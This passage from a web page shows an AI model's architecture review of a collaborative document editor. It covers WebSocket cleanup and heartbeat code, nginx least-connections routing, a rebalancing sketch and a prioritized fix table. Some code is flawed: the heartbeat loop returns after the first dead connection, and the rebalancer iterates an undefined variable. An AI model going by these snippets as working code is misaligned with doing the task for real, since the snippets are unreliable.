  removeConnection(ws) {
    const meta = this.connections.get(ws);
    if (!meta) return;

    this.connections.delete(ws);

    // Remove from document subscribers
    const subs = this.documentSubscribers.get(meta.documentId);
    if (subs) {
      subs.delete(ws);

      // If no more subscribers for this document, clean up
      if (subs.size === 0) {
        this.documentSubscribers.delete(meta.documentId);
        redis.unsubscribe(`doc:${meta.documentId}`);

        // Unload OT engine after a grace period
        // (in case someone reconnects quickly)
        setTimeout(() => {
          if (!this.documentSubscribers.has(meta.documentId)) {
            documentEngines.delete(meta.documentId);
            console.log(`Unloaded OT engine for doc ${meta.documentId}`);
          }
        }, 60000);  // 60-second grace period
      }
    }

    try { ws.terminate(); } catch (e) {}
  }

  // Run every 30 seconds: detect dead connections
  startHeartbeat() {
    setInterval(() => {
      for (const [ws, meta] of this.connections) {
        if (!ws.isAlive) {
          console.log(`Dead connection detected: user ${meta.user.id}`);
          this.removeConnection(ws);
          return;
        }
        ws.isAlive = false;
        ws.ping();  // client must respond with pong within 30s
      }
    }, 30000);
  }
}

7. LOAD BALANCER FAILURE MODE

7.1 Round-Robin + WebSockets = Unbalanced Load

Scenario: Start with 2 servers, each gets 5000 connections.
Add server 3 for scaling.

Server 1: 5000 connections (existing, long-lived)
Server 2: 5000 connections (existing, long-lived)
Server 3: 0 connections     (new, gets only NEW connections)

Round-robin sends new connections equally, but existing connections
don't rebalance. Server 3 is idle while 1 and 2 are overloaded.

The Solution: Least-connections routing + connection count awareness.

upstream api_servers {
    # Use least_conn instead of round-robin for WebSocket connections
    # This sends new connections to the server with fewest active connections
    least_conn;

    server api-1:3000;
    server api-2:3000;
    server api-3:3000;
}

# BUT: combine with consistent hashing for document routing (from 3.1)
# Use a two-tier approach:

# Tier 1: Document-to-server assignment (consistent hash)
# Tier 2: Within the assigned server, least-connections for load awareness

// Active rebalancing: when a new server joins, gradually migrate documents
async function rebalanceDocuments(newServerList) {
  const currentAssignments = await getDocumentAssignments();
  const newAssignments = consistentHash(currentAssignments, newServerList);

  for (const [docId, { oldServer, newServer }] of changedAssignments) {
    if (oldServer !== newServer) {
      // Gracefully migrate: tell clients to reconnect to new server
      await notifyClientsToReconnect(docId, newServer);
      // Stagger migrations to avoid thundering herd
      await sleep(100);
    }
  }
}

SUMMARY: PRIORITIZED FIX ORDER

┌────┬──────────────────────────────────────┬──────────┬────────────┐
│ #  │ Issue                                │ Severity │ Effort     │
├────┼──────────────────────────────────────┼──────────┼────────────┤
│ 1  │ Last-write-wins destroys data (1.2)  │ CRITICAL │ High       │
│ 2  │ JWT in localStorage / XSS (4.1)     │ CRITICAL │ Medium     │
│ 3  │ No document authorization (4.3)     │ CRITICAL │ Medium     │
│ 4  │ 30s snapshot data loss (2.1)        │ HIGH     │ Medium     │
│ 5  │ CDN caching API responses (5.1)     │ HIGH     │ Low        │
│ 6  │ 2-second cross-server delay (1.1)   │ HIGH     │ Low        │
│ 7  │ Client clock timestamps (1.3)       │ HIGH     │ Low        │
│ 8  │ No reconnection handling (6.1)      │ HIGH     │ Medium     │
│ 9  │ JWT no revocation (4.2)             │ MEDIUM   │ Medium     │
│ 10 │ Split-brain document routing (3.1)  │ MEDIUM   │ Medium     │
│ 11 │ HTML snapshot bloat/XSS (2.2)       │ MEDIUM   │ Medium     │
│ 12 │ Org-based hot spots (3.3)           │ MEDIUM   │ Low        │
│ 13 │ Read replica staleness (3.2)        │ MEDIUM   │ Medium     │
│ 14 │ PG write bottleneck (2.3)           │ LOW*     │ High       │
│ 15 │ WebSocket memory leaks (6.2)        │ LOW*     │ Medium     │
│ 16 │ Round-robin imbalance (7.1)         │ LOW*     │ Low        │
└────┴──────────────────────────────────────┴──────────┴────────────┘
  * LOW at current scale, becomes HIGH at scale

Debug This Architecture

Turn this model response into notes, narration, or a short video

Auto Notes Transcript Narrate Video Cut

Partner link

This output is part of our open dataset — 5K+ AI responses across 200 models

About Claude Opus 4.6

Capabilities

ConversationReasoningCode GenerationAnalysisTool Use

Specifications

Provider: Anthropic
Released: 2026-02-04
Size: XLARGE
Context: 1,000,000 tokens

Keep exploring

SAME PROMPT

Claude Sonnet 4.6's version

Same prompt, different result

COMPARE

Claude Opus 4.6 vs Gemini 3.1 Pro Preview

Both outputs, side by side

Debug This Architecture

?Prompt

Response

Comprehensive Architecture Review: Real-time Collaborative Document Editor

1. REAL-TIME SYNCHRONIZATION FAILURES

1.1 The Split-Brain WebSocket Problem

1.2 Last-Write-Wins Destroys User Work

1.3 Client Clock Timestamps Are Unreliable

2. DATA STORAGE AND PERSISTENCE FAILURES

2.1 30-Second Snapshot Interval = 30 Seconds of Data Loss

2.2 Full HTML Snapshots Are Fragile and Bloated

2.3 PostgreSQL Write Bottleneck Under Real-Time Load

3. SCALING AND CONCURRENCY FAILURES

3.1 Document-Level Concurrency Bottleneck

3.2 Read Replica Lag Causes Stale Reads

3.3 Organization-Based Partitioning Creates Hot Spots

4. SECURITY VULNERABILITIES

4.1 JWT in localStorage = XSS Token Theft

4.2 24-Hour JWT with No Revocation

4.3 No Document-Level Authorization on WebSocket Messages

5. CDN AND CACHING FAILURES

5.1 CDN Caching API Responses = Serving Stale/Wrong Data

6. CONNECTION MANAGEMENT FAILURES

6.1 No WebSocket Reconnection or Offline Handling

6.2 WebSocket Memory Leaks on Server

7. LOAD BALANCER FAILURE MODE

7.1 Round-Robin + WebSockets = Unbalanced Load

SUMMARY: PRIORITIZED FIX ORDER

About Claude Opus 4.6

Capabilities

Categories

Specifications

Claude Sonnet 4.6's version

Claude Opus 4.6 vs Gemini 3.1 Pro Preview

Debug This Architecture

?Prompt

Response

Comprehensive Architecture Review: Real-time Collaborative Document Editor

1. REAL-TIME SYNCHRONIZATION FAILURES

1.1 The Split-Brain WebSocket Problem

1.2 Last-Write-Wins Destroys User Work

1.3 Client Clock Timestamps Are Unreliable

2. DATA STORAGE AND PERSISTENCE FAILURES

2.1 30-Second Snapshot Interval = 30 Seconds of Data Loss

2.2 Full HTML Snapshots Are Fragile and Bloated

2.3 PostgreSQL Write Bottleneck Under Real-Time Load

3. SCALING AND CONCURRENCY FAILURES

3.1 Document-Level Concurrency Bottleneck

3.2 Read Replica Lag Causes Stale Reads

3.3 Organization-Based Partitioning Creates Hot Spots

4. SECURITY VULNERABILITIES

4.1 JWT in localStorage = XSS Token Theft

4.2 24-Hour JWT with No Revocation

4.3 No Document-Level Authorization on WebSocket Messages

5. CDN AND CACHING FAILURES

5.1 CDN Caching API Responses = Serving Stale/Wrong Data

6. CONNECTION MANAGEMENT FAILURES

6.1 No WebSocket Reconnection or Offline Handling

6.2 WebSocket Memory Leaks on Server

7. LOAD BALANCER FAILURE MODE

7.1 Round-Robin + WebSockets = Unbalanced Load

SUMMARY: PRIORITIZED FIX ORDER

About Claude Opus 4.6

Capabilities

Categories

Specifications

Claude Sonnet 4.6's version

Claude Opus 4.6 vs Gemini 3.1 Pro Preview

?
Prompt

?
Prompt